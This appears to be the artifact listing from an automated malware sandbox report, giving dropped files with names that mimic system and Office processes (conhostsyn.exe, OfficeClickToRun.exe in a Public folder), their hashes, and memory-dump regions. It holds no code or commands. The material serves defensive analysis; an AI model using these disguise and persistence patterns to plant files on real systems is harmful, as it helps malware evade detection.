Download Submit
C:\Users\Admin\AppData\Local\Temp\ySFzI8Y5Xy.bat

Filesize
171B

MD5
2f53a2154b3887f364bff62c9b4ea57b

SHA1
5ff4f7f0deeacae46c72169cbfc9e63a3a2d20c3

SHA256
c1c7bc5bbc85dbaf439a74ac06e0b4bb68716a8a0f5e25a2987ee684933c1ce2

SHA512
fc8206dd46c32e517190b60b0b8f2844ed11073398ac3a21112ef8c4d7d4402581f45231f4002d93ce1ad8675709f80880cab117a994bdc98bd59eb3d0e923c1

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

Filesize
64.9MB

MD5
81215de851edc9936f33cb2b39dc5c83

SHA1
1dab0fba100990e20c9d1dcd8bf8a68bb4b9f1bd

SHA256
b41a4ddcd528f98a953cd58b2c39b61bd3b94d536c3ffe9bb95fc5a7d05282b8

SHA512
4505b385ce409054ac90e93d2afe4ad6eab18c8197a05ae25873e25e775ec8a9cbf4fbe4b683886d5351e5d62ed187c38232f0fe533b9135b7056dc2b52bfa63

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

Filesize
67.3MB

MD5
d64039f76fa1e05683dd56a73b504be1

SHA1
60827659eb3d14768bceb080881590bc1cd8e64a

SHA256
e76afb231edde0e229f6a7ec1f2a306f006dd1f7b94090e0cad0bc90343f753e

SHA512
2a239edc43d33f2a68a28dd8bf9ee48a3760702d498cbb7ca5338bf0b29ae5d48fdf891453975709ffdc90b2ff300f452e8aa70f54ce4f1cc21bb59bdaee5bea

Download Submit
C:\Users\Admin\AppData\Roaming\.conhostsyn.exe

Filesize
82.6MB

MD5
6100f077cadea4cd0b2e8b4af2a9356b

SHA1
fa49acb7d1e2dd4da69e1d7d74e63471ab4f5b23

SHA256
ff4222992039210e0efd9e9c87e0a3bdf56ebbdb7710b791d0bfe1009877602f

SHA512
6fc2fbfbd204314c7051b3836619050e15cd4801f65e801381e302cd7ad6d247dc1af1c9ddb0393da01c52e6dc08f5483371b0febec49a2c6f90b94236adbbe3

Download Submit
C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

Filesize
63.1MB

MD5
0cf0466195a3f717e835f7e8e54a554b

SHA1
db8a860c5e6ac7ec2eb9e36cbe64c99a5fea4723

SHA256
25c002a5e11361a8dcb164cae5f5c463e289478a7e396e91638b162470fcb2ef

SHA512
f78afe73d160fafdc01fc1c066015034d672d499a977bfd53ef99267b29a15241e6186546681bc930a2efc6d82d8fc6e8e7578941c5e608fca80fcdd66595b04

Download Submit
C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

Filesize
63.1MB

MD5
ae7f54b67f56ad351667d713c7a6a9b2

SHA1
d044753e424a4e57b324b036542ef82b0c536bef

SHA256
722fbad26277b764a34afbd17d152c9873a7fb8f5cb7c85d3bfe3e7d4c3f1ea6

SHA512
dea76be1d099e3581fefb17714a0d23f3034ad6e7275c989cee7f77c32e26b85d86ad93bd901adc9f6574f22ffa3573d13d50d77b74c1650c848bf495dd1495a

Download Submit
C:\Users\Admin\AppData\Roaming\.rbHypersurrogatesavesDhcp.exe

Filesize
78.0MB

MD5
8caf81e034093f0cf37431c7b7455a29

SHA1
e42c58b8de16e6acb5332c056d76f1fb1f107e0a

SHA256
518b3f8cb81c7ee1a01df3cd8b40961bc0804dea4cd575a1b8ae38a378ea806b

SHA512
f9a0e5414dcc575bd7bcd9d4504b137616fc53cb883df599f864ece6d49c2f231f541335c8371b72ff68b71223d48bf817dd3b978454409fa036fe2fd225808f

Download Submit
C:\Users\Admin\AppData\Roaming\Nezur.exe

Filesize
2.1MB

MD5
d6f133dee71ed4c119a2d2aaf4cf3a69

SHA1
d31a9b77e1eb1308c6c686e7b1715999ad18019b

SHA256
3c1ada57fbbe1a5fe4e56ab89545f9c38b888676ef303ffb2934d289937af83d

SHA512
8ef3020a156a4ffa978b89336a04c3ea3498912680e7cb5b9348d5884812bf456c8e739fba8b81d48e5234a1627e15bb5ddc2c014c5ff1c00088ab6373ce9381

Download Submit
C:\Users\Admin\AppData\Roaming\conhostsyn.exe

Filesize
3.1MB

MD5
912ff4e169ed2797eb2811d53fa32b21

SHA1
1d30a58c1361f30b000a7a6178020562ea51c9e8

SHA256
6d501a4c31103b36ffed7f94f5db1041b664e0aed3e94fb868a94740180a1ede

SHA512
a566a82d7230282ff477c5abfcfdc3c6fb6a4f3064b6f7ab3aef712bfe118460262ecbe69640c6e3c39b6b9eeebf6ff60c6aea9486342eef55f6f7e9dd086427

Download Submit
C:\Users\Admin\AppData\Roaming\rbHypersurrogatesavesDhcp.exe

Filesize
2.7MB

MD5
523863b176989e0d286668451fad4451

SHA1
e82feee7b13e153231fb9792772f59f4d37b9101

SHA256
3753a3d6ce56f07f97f30a1a9577a7e9ecc324fc6c11508ac6fad7b907553390

SHA512
d19265f18aac97d8515716d530cf149b068b80fa82bab425890b160b2a8b2016e47a480bd187bb66496aa593fb2513bf2b5b1147d7489a5b8fa3a80ac8b964e4

Download Submit
C:\Users\Public\Videos\OfficeClickToRun.exe

Filesize
38.1MB

MD5
f2185a06c5c3e4cbd85132c9fc8da8b8

SHA1
ed54b79c44c86d51d125185667e34ce4af4af860

SHA256
bb289e0b5429503139f2c1af4d5d2bb2147ca65b6a7e9e0913937c8cddb9f76b

SHA512
1aec000d7110dfdcdd75b6723b1d8feaa68392b8a4ca419c9b4b79cd786fdaee57496f3561bcc2947babc35ef9616bbcf45791bb3eb3fd42f2fed28355e928cc

Download Submit
C:\Users\Public\Videos\OfficeClickToRun.exe

Filesize
38.9MB

MD5
c3a6a8014e29ea58129d14a4fbd81615

SHA1
e8eec50c357feec8a0f447dc0942dca1ddc91bb2

SHA256
6dc7848151e6a974ad2b62d288682e839940a74338c5c3f64e402dd24f733646

SHA512
0acae9e091074f825810a5dd4dd721fdf3a9328441a82a1e83e57d87d144ff5fffd39b0f945d073b1bd14d1e5f8eaada1ff4a19d2a12af2f9697b29f39fe9521

Download Submit
C:\Users\Public\Videos\OfficeClickToRun.exe

Filesize
29.9MB

MD5
768afb29f211390ae3da8cfa9ccdc6d1

SHA1
c291b4a9a1c66cf592cd526d1c9725f6f8958e83

SHA256
45f39412cbd1447998b962a00daa0b1ccefa56ce0d11d118d3be80f182c0fe63

SHA512
af537bf6f1b4b70dff75c90503500b22b853fab6a5081f77f4494a5e7275f5b301db738ff5ef4cac8c2f7ee91c0b28affe5298390c08abf2b16d1de43ba8e01d

Download Submit
C:\Users\Public\Videos\OfficeClickToRun.exe

Filesize
24.6MB

MD5
9f129e9cd97fd844a7b68a6330557b55

SHA1
5274a2a284821522008e9c3d2445b0785f4becae

SHA256
20ca30e85418cb8101d208f55a613326e016df26ec1a372efd19e63cbd074a90

SHA512
84eda2869968edb27b0ea480151a79b0de20732959031b32e4601f4de1bc1d500e0ba828475ca95cf9ccc4ff9694ee392680b7a55e969dc32a6ee081e8be5db4

Download Submit
memory/404-415-0x000000001C7D0000-0x000000001C7D8000-memory.dmp

Filesize
32KB

Download
memory/1140-323-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1140-322-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1140-328-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1140-326-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1140-325-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1140-324-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1332-275-0x000001DD6F070000-0x000001DD6F28C000-memory.dmp

Filesize
2.1MB

Download
memory/1444-278-0x0000021A32770000-0x0000021A3298C000-memory.dmp

Filesize
2.1MB

Download
memory/1476-282-0x000002AF78CE0000-0x000002AF78EFC000-memory.dmp

Filesize
2.1MB

Download
memory/1596-369-0x0000000002EF0000-0x0000000002EF8000-memory.dmp

Filesize
32KB

Download
memory/1892-7-0x000000007F410000-0x000000007F7E1000-memory.dmp

Filesize
3.8MB

Download
memory/1892-2-0x0000000074820000-0x0000000074FD0000-memory.dmp

Filesize
7.7MB

Download
memory/1892-1-0x000000007F410000-0x000000007F7E1000-memory.dmp

Filesize
3.8MB

Download
memory/1892-3-0x0000000000720000-0x00000000010CA000-memory.dmp

Filesize
9.7MB

Download
memory/1892-4-0x0000000000720000-0x00000000010CA000-memory.dmp

Filesize
9.7MB

Download
memory/1892-6-0x0000000000720000-0x00000000010CA000-memory.dmp

Filesize
9.7MB

Download
memory/1892-0-0x0000000000720000-0x00000000010CA000-memory.dmp

Filesize
9.7MB

Download
memory/1892-9-0x0000000074820000-0x0000000074FD0000-memory.dmp

Filesize
7.7MB

Download
memory/2196-454-0x000000001B6F0000-0x000000001B6F8000-memory.dmp

Filesize
32KB

Download
memory/3232-44-0x0000000007960000-0x000000000797A000-memory.dmp

Filesize
104KB

Download
memory/3232-31-0x0000000075070000-0x00000000750BC000-memory.dmp

Filesize
304KB

Download
memory/3232-8-0x0000000074820000-0x0000000074FD0000-memory.dmp

Filesize
7.7MB

Download
memory/3232-11-0x0000000005220000-0x0000000005230000-memory.dmp

Filesize
64KB

Download
memory/3232-10-0x0000000005080000-0x00000000050B6000-memory.dmp

Filesize
216KB

Download
memory/3232-12-0x0000000005860000-0x0000000005E88000-memory.dmp

Filesize
6.2MB

Download
memory/3232-13-0x0000000005770000-0x0000000005792000-memory.dmp

Filesize
136KB

Download
memory/3232-14-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/3232-15-0x0000000005F70000-0x0000000005FD6000-memory.dmp

Filesize
408KB

Download
memory/3232-25-0x0000000005FF0000-0x0000000006344000-memory.dmp

Filesize
3.3MB

Download
memory/3232-26-0x0000000006640000-0x000000000665E000-memory.dmp

Filesize
120KB

Download
memory/3232-27-0x0000000006680000-0x00000000066CC000-memory.dmp

Filesize
304KB

Download
memory/3232-28-0x0000000005220000-0x0000000005230000-memory.dmp

Filesize
64KB

Download
memory/3232-30-0x0000000007620000-0x0000000007652000-memory.dmp

Filesize
200KB

Download
memory/3232-41-0x0000000006C10000-0x0000000006C2E000-memory.dmp

Filesize
120KB

Download
memory/3232-81-0x0000000074820000-0x0000000074FD0000-memory.dmp

Filesize
7.7MB

Download
memory/3232-29-0x000000007F3D0000-0x000000007F3E0000-memory.dmp

Filesize
64KB

Download
memory/3232-42-0x0000000007860000-0x0000000007903000-memory.dmp

Filesize
652KB

Download
memory/3232-43-0x0000000007FB0000-0x000000000862A000-memory.dmp

Filesize
6.5MB

Download
memory/3232-45-0x00000000079C0000-0x00000000079CA000-memory.dmp

Filesize
40KB

Download
memory/3232-46-0x0000000007C20000-0x0000000007CB6000-memory.dmp

Filesize
600KB

Download
memory/3232-47-0x0000000007B50000-0x0000000007B61000-memory.dmp

Filesize
68KB

Download
memory/3232-48-0x0000000007B90000-0x0000000007B9E000-memory.dmp

Filesize
56KB

Download
memory/3232-49-0x0000000007BA0000-0x0000000007BB4000-memory.dmp

Filesize
80KB

Download
memory/3232-50-0x0000000007BE0000-0x0000000007BFA000-memory.dmp

Filesize
104KB

Download
memory/3232-53-0x0000000008BE0000-0x0000000009184000-memory.dmp

Filesize
5.6MB

Download
memory/3232-52-0x0000000007CF0000-0x0000000007D12000-memory.dmp

Filesize
136KB

Download
memory/3232-51-0x0000000007BD0000-0x0000000007BD8000-memory.dmp

Filesize
32KB

Download
memory/3488-269-0x000001C657770000-0x000001C65798C000-memory.dmp

Filesize
2.1MB

Download
memory/3924-270-0x000002DC451F0000-0x000002DC4540C000-memory.dmp

Filesize
2.1MB

Download
memory/4516-125-0x0000000002E00000-0x0000000002E0E000-memory.dmp

Filesize
56KB

Download
memory/4516-107-0x00007FFF0E9C0000-0x00007FFF0F481000-memory.dmp

Filesize
10.8MB

Download
memory/4516-142-0x00007FFF2CA60000-0x00007FFF2CB1E000-memory.dmp

Filesize
760KB

Download
memory/4516-141-0x000000001B930000-0x000000001B940000-memory.dmp

Filesize
64KB

Download
memory/4516-136-0x000000001B8D0000-0x000000001B8DE000-memory.dmp

Filesize
56KB

Download
memory/4516-138-0x00007FFF2C520000-0x00007FFF2C521000-memory.dmp

Filesize
4KB

Download
memory/4516-140-0x000000001B8E0000-0x000000001B8EC000-memory.dmp

Filesize
48KB

Download
memory/4516-137-0x00007FFF2C530000-0x00007FFF2C531000-memory.dmp

Filesize
4KB

Download
memory/4516-134-0x000000001B930000-0x000000001B940000-memory.dmp

Filesize
64KB

Download
memory/4516-131-0x00007FFF2C540000-0x00007FFF2C541000-memory.dmp

Filesize
4KB

Download
memory/4516-133-0x000000001B8C0000-0x000000001B8CC000-memory.dmp

Filesize
48KB

Download
memory/4516-130-0x00007FFF2C550000-0x00007FFF2C551000-memory.dmp

Filesize
4KB

Download
memory/4516-129-0x00007FFF0E9C0000-0x00007FFF0F481000-memory.dmp

Filesize
10.8MB

Download
memory/4516-128-0x0000000002E10000-0x0000000002E1E000-memory.dmp

Filesize
56KB

Download
memory/4516-117-0x000000001B930000-0x000000001B940000-memory.dmp

Filesize
64KB

Download
memory/4516-106-0x0000000000A50000-0x0000000000C54000-memory.dmp

Filesize
2.0MB

Download
memory/4516-126-0x00007FFF2C560000-0x00007FFF2C561000-memory.dmp

Filesize
4KB

Download
memory/4516-123-0x00007FFF2C570000-0x00007FFF2C571000-memory.dmp

Filesize
4KB

Download
memory/4516-122-0x000000001B8A0000-0x000000001B8B8000-memory.dmp

Filesize
96KB

Download
memory/4516-116-0x000000001B880000-0x000000001B89C000-memory.dmp

Filesize
112KB

Download
memory/4516-118-0x00007FFF2CA60000-0x00007FFF2CB1E000-memory.dmp

Filesize
760KB

Download
memory/4516-120-0x000000001BB40000-0x000000001BB90000-memory.dmp

Filesize
320KB

Download
memory/4516-119-0x00007FFF2CA40000-0x00007FFF2CA41000-memory.dmp

Filesize
4KB

Download
memory/4516-114-0x00007FFF2CA50000-0x00007FFF2CA51000-memory.dmp

Filesize
4KB

Download
memory/4516-112-0x0000000002CE0000-0x0000000002CEE000-memory.dmp

Filesize
56KB

Download
memory/4516-113-0x00007FFF2CA60000-0x00007FFF2CB1E000-memory.dmp

Filesize
760KB

Download
memory/4516-110-0x000000001B930000-0x000000001B940000-memory.dmp

Filesize
64KB

Download
memory/4516-109-0x00000000014F0000-0x00000000014F1000-memory.dmp

Filesize
4KB

Download
memory/4516-108-0x000000001B930000-0x000000001B940000-memory.dmp

Filesize
64KB

Download